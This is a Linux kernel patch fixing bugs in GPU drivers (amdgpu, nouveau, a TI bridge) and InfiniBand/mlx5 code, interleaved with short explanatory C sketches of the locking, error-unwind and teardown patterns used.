+index 1f3fdf6cb903e..fe371022e5104 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+@@ -3650,8 +3650,10 @@ static int gfx_v9_0_kiq_resume(struct amdgpu_device *adev)
+ 		return r;
+ 
+ 	r = amdgpu_bo_kmap(ring->mqd_obj, (void **)&ring->mqd_ptr);
+-	if (unlikely(r != 0))
++	if (unlikely(r != 0)) {
++		amdgpu_bo_unreserve(ring->mqd_obj);
+ 		return r;
++	}
+ 
+ 	gfx_v9_0_kiq_init_queue(ring);
+ 	amdgpu_bo_kunmap(ring->mqd_obj);
+diff --git a/drivers/gpu/drm/amd/amdgpu/vcn_v4_0.c b/drivers/gpu/drm/amd/amdgpu/vcn_v4_0.c
+index dcc49b01bd59d..300bb926dcba4 100644
+--- a/drivers/gpu/drm/amd/amdgpu/vcn_v4_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/vcn_v4_0.c
+@@ -117,7 +117,11 @@ static int vcn_v4_0_sw_init(void *handle)
+ 		if (adev->vcn.harvest_config & (1 << i))
+ 			continue;
+ 
+-		atomic_set(&adev->vcn.inst[i].sched_score, 0);
++		/* Init instance 0 sched_score to 1, so it's scheduled after other instances */
++		if (i == 0)
++			atomic_set(&adev->vcn.inst[i].sched_score, 1);
++		else
++			atomic_set(&adev->vcn.inst[i].sched_score, 0);
+ 
+ 		/* VCN UNIFIED TRAP */
+ 		r = amdgpu_irq_add_id(adev, amdgpu_ih_clientid_vcns[i],
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 8ab0dd799b3cb..53687de6c0530 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -83,7 +83,6 @@
+ #include <drm/drm_atomic_uapi.h>
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_blend.h>
+-#include <drm/drm_fb_helper.h>
+ #include <drm/drm_fourcc.h>
+ #include <drm/drm_edid.h>
+ #include <drm/drm_vblank.h>
+@@ -2875,7 +2874,6 @@ const struct amdgpu_ip_block_version dm_ip_block =
+ static const struct drm_mode_config_funcs amdgpu_dm_mode_funcs = {
+ 	.fb_create = amdgpu_display_user_framebuffer_create,
+ 	.get_format_info = amd_get_format_info,
+-	.output_poll_changed = drm_fb_helper_output_poll_changed,
+ 	.atomic_check = amdgpu_dm_atomic_check,
+ 	.atomic_commit = drm_atomic_helper_commit,
+ };
+@@ -6942,7 +6940,13 @@ static int amdgpu_dm_connector_get_modes(struct drm_connector *connector)
+ 				drm_add_modes_noedid(connector, 640, 480);
+ 	} else {
+ 		amdgpu_dm_connector_ddc_get_modes(connector, edid);
+-		amdgpu_dm_connector_add_common_modes(encoder, connector);
++		/* most eDP supports only timings from its edid,
++		 * usually only detailed timings are available
++		 * from eDP edid. timings which are not from edid
++		 * may damage eDP
++		 */
++		if (connector->connector_type != DRM_MODE_CONNECTOR_eDP)
++			amdgpu_dm_connector_add_common_modes(encoder, connector);
+ 		amdgpu_dm_connector_add_freesync_modes(connector, edid);
+ 	}
+ 	amdgpu_dm_fbc_init(connector);
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index 508e392547d7a..54fc42dad7755 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -1675,10 +1675,39 @@ static int smu_v13_0_0_set_power_profile_mode(struct smu_context *smu,
+ 		}
+ 	}
+ 
+-	/* conv PP_SMC_POWER_PROFILE* to WORKLOAD_PPLIB_*_BIT */
+-	workload_type = smu_cmn_to_asic_specific_index(smu,
++	if (smu->power_profile_mode == PP_SMC_POWER_PROFILE_COMPUTE &&
++		(((smu->adev->pdev->device == 0x744C) && (smu->adev->pdev->revision == 0xC8)) ||
++		((smu->adev->pdev->device == 0x744C) && (smu->adev->pdev->revision == 0xCC)))) {
++		ret = smu_cmn_update_table(smu,
++					   SMU_TABLE_ACTIVITY_MONITOR_COEFF,
++					   WORKLOAD_PPLIB_COMPUTE_BIT,
++					   (void *)(&activity_monitor_external),
++					   false);
++		if (ret) {
++			dev_err(smu->adev->dev, "[%s] Failed to get activity monitor!", __func__);
++			return ret;
++		}
++
++		ret = smu_cmn_update_table(smu,
++					   SMU_TABLE_ACTIVITY_MONITOR_COEFF,
++					   WORKLOAD_PPLIB_CUSTOM_BIT,
++					   (void *)(&activity_monitor_external),
++					   true);
++		if (ret) {
++			dev_err(smu->adev->dev, "[%s] Failed to set activity monitor!", __func__);
++			return ret;
++		}
++
++		workload_type = smu_cmn_to_asic_specific_index(smu,
++						       CMN2ASIC_MAPPING_WORKLOAD,
++						       PP_SMC_POWER_PROFILE_CUSTOM);
++	} else {
++		/* conv PP_SMC_POWER_PROFILE* to WORKLOAD_PPLIB_*_BIT */
++		workload_type = smu_cmn_to_asic_specific_index(smu,
+ 						       CMN2ASIC_MAPPING_WORKLOAD,
+ 						       smu->power_profile_mode);
++	}
++
+ 	if (workload_type < 0)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi86.c b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+index aeca9c066bf29..d16775c973c4e 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi86.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+@@ -298,6 +298,10 @@ static void ti_sn_bridge_set_refclk_freq(struct ti_sn65dsi86 *pdata)
+ 		if (refclk_lut[i] == refclk_rate)
+ 			break;
+ 
++	/* avoid buffer overflow and "1" is the default rate in the datasheet. */
++	if (i >= refclk_lut_size)
++		i = 1;
++
+ 	regmap_update_bits(pdata->regmap, SN_DPPLL_SRC_REG, REFCLK_FREQ_MASK,
+ 			   REFCLK_FREQ(i));
+ 
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index b1a38e6ce2f8f..0cb646cb04ee1 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -179,7 +179,7 @@ static const struct dmi_system_id orientation_data[] = {
+ 	}, {	/* AYA NEO AIR */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "AYANEO"),
+-		  DMI_MATCH(DMI_BOARD_NAME, "AIR"),
++		  DMI_MATCH(DMI_PRODUCT_NAME, "AIR"),
+ 		},
+ 		.driver_data = (void *)&lcd1080x1920_leftside_up,
+ 	}, {	/* AYA NEO NEXT */
+diff --git a/drivers/gpu/drm/nouveau/nouveau_acpi.c b/drivers/gpu/drm/nouveau/nouveau_acpi.c
+index 8cf096f841a90..a2ae8c21e4dce 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_acpi.c
++++ b/drivers/gpu/drm/nouveau/nouveau_acpi.c
+@@ -220,6 +220,9 @@ static void nouveau_dsm_pci_probe(struct pci_dev *pdev, acpi_handle *dhandle_out
+ 	int optimus_funcs;
+ 	struct pci_dev *parent_pdev;
+ 
++	if (pdev->vendor != PCI_VENDOR_ID_NVIDIA)
++		return;
++
+ 	*has_pr3 = false;
+ 	parent_pdev = pci_upstream_bridge(pdev);
+ 	if (parent_pdev) {
+diff --git a/drivers/gpu/drm/nouveau/nouveau_connector.c b/drivers/gpu/drm/nouveau/nouveau_connector.c
+index 1991bbb1d05c3..f40310559d13f 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_connector.c
++++ b/drivers/gpu/drm/nouveau/nouveau_connector.c
+@@ -730,7 +730,8 @@ out:
+ #endif
+ 
+ 	nouveau_connector_set_edid(nv_connector, edid);
+-	nouveau_connector_set_encoder(connector, nv_encoder);
++	if (nv_encoder)
++		nouveau_connector_set_encoder(connector, nv_encoder);
+ 	return status;
+ }
+ 
+@@ -966,7 +967,7 @@ nouveau_connector_get_modes(struct drm_connector *connector)
+ 	/* Determine display colour depth for everything except LVDS now,
+ 	 * DP requires this before mode_valid() is called.
+ 	 */
+-	if (connector->connector_type != DRM_MODE_CONNECTOR_LVDS)
++	if (connector->connector_type != DRM_MODE_CONNECTOR_LVDS && nv_connector->native_mode)
+ 		nouveau_connector_detect_depth(connector);
+ 
+ 	/* Find the native mode if this is a digital panel, if we didn't
+@@ -987,7 +988,7 @@ nouveau_connector_get_modes(struct drm_connector *connector)
+ 	 * "native" mode as some VBIOS tables require us to use the
+ 	 * pixel clock as part of the lookup...
+ 	 */
+-	if (connector->connector_type == DRM_MODE_CONNECTOR_LVDS)
++	if (connector->connector_type == DRM_MODE_CONNECTOR_LVDS && nv_connector->native_mode)
+ 		nouveau_connector_detect_depth(connector);
+ 
+ 	if (nv_encoder->dcb->type == DCB_OUTPUT_TV)
+diff --git a/drivers/gpu/drm/nouveau/nouveau_drm.c b/drivers/gpu/drm/nouveau/nouveau_drm.c
+index fd99ec0f4257a..28062d682f436 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_drm.c
++++ b/drivers/gpu/drm/nouveau/nouveau_drm.c
+@@ -139,10 +139,16 @@ nouveau_name(struct drm_device *dev)
+ static inline bool
+ nouveau_cli_work_ready(struct dma_fence *fence)
+ {
+-	if (!dma_fence_is_signaled(fence))
+-		return false;
+-	dma_fence_put(fence);
+-	return true;
++	bool ret = true;
++
++	spin_lock_irq(fence->lock);
++	if (!dma_fence_is_signaled_locked(fence))
++		ret = false;
++	spin_unlock_irq(fence->lock);
++
++	if (ret)
++		dma_fence_put(fence);
++	return ret;
+ }
+ 
+ static void
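
The nouveau hunk above closes a race by sampling the fence state under its
own lock before dropping the reference. A hedged userspace sketch of the same
shape, with pthreads standing in for the kernel's dma_fence machinery (all
names illustrative):

#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>

struct fence {
	pthread_mutex_t lock;
	bool signaled;
	int refcount;
};

/* Observe the signaled state under the fence's own lock, and only
 * drop our reference once it has been seen as signaled. */
static bool fence_ready_and_put(struct fence *f)
{
	bool ret;

	pthread_mutex_lock(&f->lock);
	ret = f->signaled;
	pthread_mutex_unlock(&f->lock);

	if (ret)
		f->refcount--;	/* stand-in for dma_fence_put() */
	return ret;
}

int main(void)
{
	struct fence f = { PTHREAD_MUTEX_INITIALIZER, true, 1 };

	printf("ready=%d refs=%d\n", fence_ready_and_put(&f), f.refcount);
	return 0;
}
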
+diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
+index c6a671edba5c8..4632b1833381a 100644
+--- a/drivers/infiniband/core/cma.c
++++ b/drivers/infiniband/core/cma.c
+@@ -3293,7 +3293,7 @@ static int cma_resolve_iboe_route(struct rdma_id_private *id_priv)
+ 	route->path_rec->traffic_class = tos;
+ 	route->path_rec->mtu = iboe_get_mtu(ndev->mtu);
+ 	route->path_rec->rate_selector = IB_SA_EQ;
+-	route->path_rec->rate = iboe_get_rate(ndev);
++	route->path_rec->rate = IB_RATE_PORT_CURRENT;
+ 	dev_put(ndev);
+ 	route->path_rec->packet_life_time_selector = IB_SA_EQ;
+ 	/* In case ACK timeout is set, use this value to calculate
+@@ -4955,7 +4955,7 @@ static int cma_iboe_join_multicast(struct rdma_id_private *id_priv,
+ 	if (!ndev)
+ 		return -ENODEV;
+ 
+-	ib.rec.rate = iboe_get_rate(ndev);
++	ib.rec.rate = IB_RATE_PORT_CURRENT;
+ 	ib.rec.hop_limit = 1;
+ 	ib.rec.mtu = iboe_get_mtu(ndev->mtu);
+ 
+diff --git a/drivers/infiniband/core/uverbs_cmd.c b/drivers/infiniband/core/uverbs_cmd.c
+index 4796f6a8828ca..e836c9c477f67 100644
+--- a/drivers/infiniband/core/uverbs_cmd.c
++++ b/drivers/infiniband/core/uverbs_cmd.c
+@@ -1850,8 +1850,13 @@ static int modify_qp(struct uverbs_attr_bundle *attrs,
+ 		attr->path_mtu = cmd->base.path_mtu;
+ 	if (cmd->base.attr_mask & IB_QP_PATH_MIG_STATE)
+ 		attr->path_mig_state = cmd->base.path_mig_state;
+-	if (cmd->base.attr_mask & IB_QP_QKEY)
++	if (cmd->base.attr_mask & IB_QP_QKEY) {
++		if (cmd->base.qkey & IB_QP_SET_QKEY && !capable(CAP_NET_RAW)) {
++			ret = -EPERM;
++			goto release_qp;
++		}
+ 		attr->qkey = cmd->base.qkey;
++	}
+ 	if (cmd->base.attr_mask & IB_QP_RQ_PSN)
+ 		attr->rq_psn = cmd->base.rq_psn;
+ 	if (cmd->base.attr_mask & IB_QP_SQ_PSN)
+diff --git a/drivers/infiniband/core/uverbs_main.c b/drivers/infiniband/core/uverbs_main.c
+index d544340887277..fa937cd268219 100644
+--- a/drivers/infiniband/core/uverbs_main.c
++++ b/drivers/infiniband/core/uverbs_main.c
+@@ -222,8 +222,12 @@ static ssize_t ib_uverbs_event_read(struct ib_uverbs_event_queue *ev_queue,
+ 	spin_lock_irq(&ev_queue->lock);
+ 
+ 	while (list_empty(&ev_queue->event_list)) {
+-		spin_unlock_irq(&ev_queue->lock);
++		if (ev_queue->is_closed) {
++			spin_unlock_irq(&ev_queue->lock);
++			return -EIO;
++		}
+ 
++		spin_unlock_irq(&ev_queue->lock);
+ 		if (filp->f_flags & O_NONBLOCK)
+ 			return -EAGAIN;
+ 
+@@ -233,12 +237,6 @@ static ssize_t ib_uverbs_event_read(struct ib_uverbs_event_queue *ev_queue,
+ 			return -ERESTARTSYS;
+ 
+ 		spin_lock_irq(&ev_queue->lock);
+-
+-		/* If device was disassociated and no event exists set an error */
+-		if (list_empty(&ev_queue->event_list) && ev_queue->is_closed) {
+-			spin_unlock_irq(&ev_queue->lock);
+-			return -EIO;
+-		}
+ 	}
+ 
+ 	event = list_entry(ev_queue->event_list.next, struct ib_uverbs_event, list);
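
The uverbs fix above hoists the "queue closed" test to the top of the wait
loop, so a reader never sleeps on a queue that can no longer produce events.
A standalone sketch of that loop ordering, with a condition variable standing
in for the kernel wait queue (names illustrative):

#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>

struct evq {
	pthread_mutex_t lock;
	pthread_cond_t cond;
	int nr_events;
	bool closed;
};

/* Return 0 and consume one event, or -1 if the queue is closed. */
static int evq_read(struct evq *q)
{
	pthread_mutex_lock(&q->lock);
	while (q->nr_events == 0) {
		if (q->closed) {		/* check before sleeping */
			pthread_mutex_unlock(&q->lock);
			return -1;
		}
		pthread_cond_wait(&q->cond, &q->lock);
	}
	q->nr_events--;
	pthread_mutex_unlock(&q->lock);
	return 0;
}

int main(void)
{
	struct evq q = { PTHREAD_MUTEX_INITIALIZER,
			 PTHREAD_COND_INITIALIZER, 1, false };

	printf("%d\n", evq_read(&q));	/* 0: one event consumed */
	q.closed = true;
	printf("%d\n", evq_read(&q));	/* -1: closed and empty */
	return 0;
}
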
+diff --git a/drivers/infiniband/hw/mlx5/fs.c b/drivers/infiniband/hw/mlx5/fs.c
+index 490ec308e3098..5a13d902b0641 100644
+--- a/drivers/infiniband/hw/mlx5/fs.c
++++ b/drivers/infiniband/hw/mlx5/fs.c
+@@ -696,8 +696,6 @@ static struct mlx5_ib_flow_prio *_get_prio(struct mlx5_ib_dev *dev,
+ 	struct mlx5_flow_table_attr ft_attr = {};
+ 	struct mlx5_flow_table *ft;
+ 
+-	if (mlx5_ib_shared_ft_allowed(&dev->ib_dev))
+-		ft_attr.uid = MLX5_SHARED_RESOURCE_UID;
+ 	ft_attr.prio = priority;
+ 	ft_attr.max_fte = num_entries;
+ 	ft_attr.flags = flags;
+@@ -2026,6 +2024,237 @@ static int flow_matcher_cleanup(struct ib_uobject *uobject,
+ 	return 0;
+ }
+ 
++static int steering_anchor_create_ft(struct mlx5_ib_dev *dev,
++				     struct mlx5_ib_flow_prio *ft_prio,
++				     enum mlx5_flow_namespace_type ns_type)
++{
++	struct mlx5_flow_table_attr ft_attr = {};
++	struct mlx5_flow_namespace *ns;
++	struct mlx5_flow_table *ft;
++
++	if (ft_prio->anchor.ft)
++		return 0;
++
++	ns = mlx5_get_flow_namespace(dev->mdev, ns_type);
++	if (!ns)
++		return -EOPNOTSUPP;
++
++	ft_attr.flags = MLX5_FLOW_TABLE_UNMANAGED;
++	ft_attr.uid = MLX5_SHARED_RESOURCE_UID;
++	ft_attr.prio = 0;
++	ft_attr.max_fte = 2;
++	ft_attr.level = 1;
++
++	ft = mlx5_create_flow_table(ns, &ft_attr);
++	if (IS_ERR(ft))
++		return PTR_ERR(ft);
++
++	ft_prio->anchor.ft = ft;
++
++	return 0;
++}
++
++static void steering_anchor_destroy_ft(struct mlx5_ib_flow_prio *ft_prio)
++{
++	if (ft_prio->anchor.ft) {
++		mlx5_destroy_flow_table(ft_prio->anchor.ft);
++		ft_prio->anchor.ft = NULL;
++	}
++}
++
++static int
++steering_anchor_create_fg_drop(struct mlx5_ib_flow_prio *ft_prio)
++{
++	int inlen = MLX5_ST_SZ_BYTES(create_flow_group_in);
++	struct mlx5_flow_group *fg;
++	void *flow_group_in;
++	int err = 0;
++
++	if (ft_prio->anchor.fg_drop)
++		return 0;
++
++	flow_group_in = kvzalloc(inlen, GFP_KERNEL);
++	if (!flow_group_in)
++		return -ENOMEM;
++
++	MLX5_SET(create_flow_group_in, flow_group_in, start_flow_index, 1);
++	MLX5_SET(create_flow_group_in, flow_group_in, end_flow_index, 1);
++
++	fg = mlx5_create_flow_group(ft_prio->anchor.ft, flow_group_in);
++	if (IS_ERR(fg)) {
++		err = PTR_ERR(fg);
++		goto out;
++	}
++
++	ft_prio->anchor.fg_drop = fg;
++
++out:
++	kvfree(flow_group_in);
++
++	return err;
++}
++
++static void
++steering_anchor_destroy_fg_drop(struct mlx5_ib_flow_prio *ft_prio)
++{
++	if (ft_prio->anchor.fg_drop) {
++		mlx5_destroy_flow_group(ft_prio->anchor.fg_drop);
++		ft_prio->anchor.fg_drop = NULL;
++	}
++}
++
++static int
++steering_anchor_create_fg_goto_table(struct mlx5_ib_flow_prio *ft_prio)
++{
++	int inlen = MLX5_ST_SZ_BYTES(create_flow_group_in);
++	struct mlx5_flow_group *fg;
++	void *flow_group_in;
++	int err = 0;
++
++	if (ft_prio->anchor.fg_goto_table)
++		return 0;
++
++	flow_group_in = kvzalloc(inlen, GFP_KERNEL);
++	if (!flow_group_in)
++		return -ENOMEM;
++
++	fg = mlx5_create_flow_group(ft_prio->anchor.ft, flow_group_in);
++	if (IS_ERR(fg)) {
++		err = PTR_ERR(fg);
++		goto out;
++	}
++	ft_prio->anchor.fg_goto_table = fg;
++
++out:
++	kvfree(flow_group_in);
++
++	return err;
++}
++
++static void
++steering_anchor_destroy_fg_goto_table(struct mlx5_ib_flow_prio *ft_prio)
++{
++	if (ft_prio->anchor.fg_goto_table) {
++		mlx5_destroy_flow_group(ft_prio->anchor.fg_goto_table);
++		ft_prio->anchor.fg_goto_table = NULL;
++	}
++}
++
++static int
++steering_anchor_create_rule_drop(struct mlx5_ib_flow_prio *ft_prio)
++{
++	struct mlx5_flow_act flow_act = {};
++	struct mlx5_flow_handle *handle;
++
++	if (ft_prio->anchor.rule_drop)
++		return 0;
++
++	flow_act.fg = ft_prio->anchor.fg_drop;
++	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_DROP;
++
++	handle = mlx5_add_flow_rules(ft_prio->anchor.ft, NULL, &flow_act,
++				     NULL, 0);
++	if (IS_ERR(handle))
++		return PTR_ERR(handle);
++
++	ft_prio->anchor.rule_drop = handle;
++
++	return 0;
++}
++
++static void steering_anchor_destroy_rule_drop(struct mlx5_ib_flow_prio *ft_prio)
++{
++	if (ft_prio->anchor.rule_drop) {
++		mlx5_del_flow_rules(ft_prio->anchor.rule_drop);
++		ft_prio->anchor.rule_drop = NULL;
++	}
++}
++
++static int
++steering_anchor_create_rule_goto_table(struct mlx5_ib_flow_prio *ft_prio)
++{
++	struct mlx5_flow_destination dest = {};
++	struct mlx5_flow_act flow_act = {};
++	struct mlx5_flow_handle *handle;
++
++	if (ft_prio->anchor.rule_goto_table)
++		return 0;
++
++	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
++	flow_act.flags |= FLOW_ACT_IGNORE_FLOW_LEVEL;
++	flow_act.fg = ft_prio->anchor.fg_goto_table;
++
++	dest.type = MLX5_FLOW_DESTINATION_TYPE_FLOW_TABLE;
++	dest.ft = ft_prio->flow_table;
++
++	handle = mlx5_add_flow_rules(ft_prio->anchor.ft, NULL, &flow_act,
++				     &dest, 1);
++	if (IS_ERR(handle))
++		return PTR_ERR(handle);
++
++	ft_prio->anchor.rule_goto_table = handle;
++
++	return 0;
++}
++
++static void
++steering_anchor_destroy_rule_goto_table(struct mlx5_ib_flow_prio *ft_prio)
++{
++	if (ft_prio->anchor.rule_goto_table) {
++		mlx5_del_flow_rules(ft_prio->anchor.rule_goto_table);
++		ft_prio->anchor.rule_goto_table = NULL;
++	}
++}
++
++static int steering_anchor_create_res(struct mlx5_ib_dev *dev,
++				      struct mlx5_ib_flow_prio *ft_prio,
++				      enum mlx5_flow_namespace_type ns_type)
++{
++	int err;
++
++	err = steering_anchor_create_ft(dev, ft_prio, ns_type);
++	if (err)
++		return err;
++
++	err = steering_anchor_create_fg_drop(ft_prio);
++	if (err)
++		goto destroy_ft;
++
++	err = steering_anchor_create_fg_goto_table(ft_prio);
++	if (err)
++		goto destroy_fg_drop;
++
++	err = steering_anchor_create_rule_drop(ft_prio);
++	if (err)
++		goto destroy_fg_goto_table;
++
++	err = steering_anchor_create_rule_goto_table(ft_prio);
++	if (err)
++		goto destroy_rule_drop;
++
++	return 0;
++
++destroy_rule_drop:
++	steering_anchor_destroy_rule_drop(ft_prio);
++destroy_fg_goto_table:
++	steering_anchor_destroy_fg_goto_table(ft_prio);
++destroy_fg_drop:
++	steering_anchor_destroy_fg_drop(ft_prio);
++destroy_ft:
++	steering_anchor_destroy_ft(ft_prio);
++
++	return err;
++}
++
++static void mlx5_steering_anchor_destroy_res(struct mlx5_ib_flow_prio *ft_prio)
++{
++	steering_anchor_destroy_rule_goto_table(ft_prio);
++	steering_anchor_destroy_rule_drop(ft_prio);
++	steering_anchor_destroy_fg_goto_table(ft_prio);
++	steering_anchor_destroy_fg_drop(ft_prio);
++	steering_anchor_destroy_ft(ft_prio);
++}
++
+ static int steering_anchor_cleanup(struct ib_uobject *uobject,
+ 				   enum rdma_remove_reason why,
+ 				   struct uverbs_attr_bundle *attrs)
+@@ -2036,6 +2265,9 @@ static int steering_anchor_cleanup(struct ib_uobject *uobject,
+ 		return -EBUSY;
+ 
+ 	mutex_lock(&obj->dev->flow_db->lock);
++	if (!--obj->ft_prio->anchor.rule_goto_table_ref)
++		steering_anchor_destroy_rule_goto_table(obj->ft_prio);
++
+ 	put_flow_table(obj->dev, obj->ft_prio, true);
+ 	mutex_unlock(&obj->dev->flow_db->lock);
+ 
+@@ -2043,6 +2275,24 @@ static int steering_anchor_cleanup(struct ib_uobject *uobject,
+ 	return 0;
+ }
+ 
++static void fs_cleanup_anchor(struct mlx5_ib_flow_prio *prio,
++			      int count)
++{
++	while (count--)
++		mlx5_steering_anchor_destroy_res(&prio[count]);
++}
++
++void mlx5_ib_fs_cleanup_anchor(struct mlx5_ib_dev *dev)
++{
++	fs_cleanup_anchor(dev->flow_db->prios, MLX5_IB_NUM_FLOW_FT);
++	fs_cleanup_anchor(dev->flow_db->egress_prios, MLX5_IB_NUM_FLOW_FT);
++	fs_cleanup_anchor(dev->flow_db->sniffer, MLX5_IB_NUM_SNIFFER_FTS);
++	fs_cleanup_anchor(dev->flow_db->egress, MLX5_IB_NUM_EGRESS_FTS);
++	fs_cleanup_anchor(dev->flow_db->fdb, MLX5_IB_NUM_FDB_FTS);
++	fs_cleanup_anchor(dev->flow_db->rdma_rx, MLX5_IB_NUM_FLOW_FT);
++	fs_cleanup_anchor(dev->flow_db->rdma_tx, MLX5_IB_NUM_FLOW_FT);
++}
++
+ static int mlx5_ib_matcher_ns(struct uverbs_attr_bundle *attrs,
+ 			      struct mlx5_ib_flow_matcher *obj)
+ {
+@@ -2183,21 +2433,31 @@ static int UVERBS_HANDLER(MLX5_IB_METHOD_STEERING_ANCHOR_CREATE)(
+ 		return -ENOMEM;
+ 
+ 	mutex_lock(&dev->flow_db->lock);
++
+ 	ft_prio = _get_flow_table(dev, priority, ns_type, 0);
+ 	if (IS_ERR(ft_prio)) {
+-		mutex_unlock(&dev->flow_db->lock);
+ 		err = PTR_ERR(ft_prio);
+ 		goto free_obj;
+ 	}
+ 
+ 	ft_prio->refcount++;
+-	ft_id = mlx5_flow_table_id(ft_prio->flow_table);
+-	mutex_unlock(&dev->flow_db->lock);
++
++	if (!ft_prio->anchor.rule_goto_table_ref) {
++		err = steering_anchor_create_res(dev, ft_prio, ns_type);
++		if (err)
++			goto put_flow_table;
++	}
++
++	ft_prio->anchor.rule_goto_table_ref++;
++
++	ft_id = mlx5_flow_table_id(ft_prio->anchor.ft);
+ 
+ 	err = uverbs_copy_to(attrs, MLX5_IB_ATTR_STEERING_ANCHOR_FT_ID,
+ 			     &ft_id, sizeof(ft_id));
+ 	if (err)
+-		goto put_flow_table;
++		goto destroy_res;
++
++	mutex_unlock(&dev->flow_db->lock);
+ 
+ 	uobj->object = obj;
+ 	obj->dev = dev;
+@@ -2206,8 +2466,10 @@ static int UVERBS_HANDLER(MLX5_IB_METHOD_STEERING_ANCHOR_CREATE)(
+ 
+ 	return 0;
+ 
++destroy_res:
++	--ft_prio->anchor.rule_goto_table_ref;
++	mlx5_steering_anchor_destroy_res(ft_prio);
+ put_flow_table:
+-	mutex_lock(&dev->flow_db->lock);
+ 	put_flow_table(dev, ft_prio, true);
+ 	mutex_unlock(&dev->flow_db->lock);
+ free_obj:
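
steering_anchor_create_res() above follows the kernel's goto-unwind idiom:
each acquisition gets a label that releases everything obtained before it,
giving a single exit path for every failure point. A compact standalone
sketch of the shape, with resources reduced to flags and a deliberate failure:

#include <stdbool.h>
#include <stdio.h>

static bool a_up, b_up;

static int get_a(void) { a_up = true; return 0; }
static int get_b(void) { b_up = true; return 0; }
static int get_c(void) { return -1; }	/* simulate a failure */

static void put_a(void) { a_up = false; }
static void put_b(void) { b_up = false; }

/* Acquire a, b, c in order; on failure, release in reverse order. */
static int create_all(void)
{
	int err;

	err = get_a();
	if (err)
		return err;
	err = get_b();
	if (err)
		goto err_put_a;
	err = get_c();
	if (err)
		goto err_put_b;
	return 0;

err_put_b:
	put_b();
err_put_a:
	put_a();
	return err;
}

int main(void)
{
	printf("err=%d a=%d b=%d\n", create_all(), a_up, b_up);
	return 0;
}
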
+diff --git a/drivers/infiniband/hw/mlx5/fs.h b/drivers/infiniband/hw/mlx5/fs.h
+index ad320adaf3217..b9734904f5f01 100644
+--- a/drivers/infiniband/hw/mlx5/fs.h
++++ b/drivers/infiniband/hw/mlx5/fs.h
+@@ -10,6 +10,7 @@
+ 
+ #if IS_ENABLED(CONFIG_INFINIBAND_USER_ACCESS)
+ int mlx5_ib_fs_init(struct mlx5_ib_dev *dev);
++void mlx5_ib_fs_cleanup_anchor(struct mlx5_ib_dev *dev);
+ #else
+ static inline int mlx5_ib_fs_init(struct mlx5_ib_dev *dev)
+ {
+@@ -21,9 +22,24 @@ static inline int mlx5_ib_fs_init(struct mlx5_ib_dev *dev)
+ 	mutex_init(&dev->flow_db->lock);
+ 	return 0;
+ }
++
++inline void mlx5_ib_fs_cleanup_anchor(struct mlx5_ib_dev *dev) {}
+ #endif
++
+ static inline void mlx5_ib_fs_cleanup(struct mlx5_ib_dev *dev)
+ {
++	/* When a steering anchor is created, a special flow table is also
++	 * created for the user to reference. Since the user can reference it,
++	 * the kernel cannot trust that when the user destroys the steering
++	 * anchor, they no longer reference the flow table.
++	 *
++	 * To address this issue, when a user destroys a steering anchor, only
++	 * the flow steering rule in the table is destroyed, but the table
++	 * itself is kept to deal with the above scenario. The remaining
++	 * resources are only removed when the RDMA device is destroyed, at
++	 * which point it is safe to assume all references are gone.
++	 */
++	mlx5_ib_fs_cleanup_anchor(dev);
+ 	kfree(dev->flow_db);
+ }
+ #endif /* _MLX5_IB_FS_H */
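
The fs.h comment above describes a two-phase teardown: the user-visible
destroy removes only the steering rule, while the backing table survives
until device teardown, when no user references can remain. A small sketch of
that split, with flags and a counter standing in for the real objects:

#include <stdio.h>

struct anchor {
	int have_table;		/* long-lived resource */
	int have_rule;		/* dropped as soon as users are gone */
	unsigned int refs;
};

/* Phase 1: user destroy. Drop the rule, but keep the table alive
 * because the user may still reference it by ID. */
static void anchor_user_destroy(struct anchor *a)
{
	if (!--a->refs)
		a->have_rule = 0;
}

/* Phase 2: device teardown. Now it is safe to free everything. */
static void anchor_device_destroy(struct anchor *a)
{
	a->have_rule = 0;
	a->have_table = 0;
}

int main(void)
{
	struct anchor a = { 1, 1, 1 };

	anchor_user_destroy(&a);
	printf("after user destroy: table=%d rule=%d\n",
	       a.have_table, a.have_rule);	/* table=1 rule=0 */
	anchor_device_destroy(&a);
	printf("after device destroy: table=%d rule=%d\n",
	       a.have_table, a.have_rule);	/* table=0 rule=0 */
	return 0;
}
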
+diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c
+index eaa35e1df2a85..3178df55c4d85 100644
+--- a/drivers/infiniband/hw/mlx5/main.c
++++ b/drivers/infiniband/hw/mlx5/main.c
+@@ -4250,6 +4250,9 @@ const struct mlx5_ib_profile raw_eth_profile = {
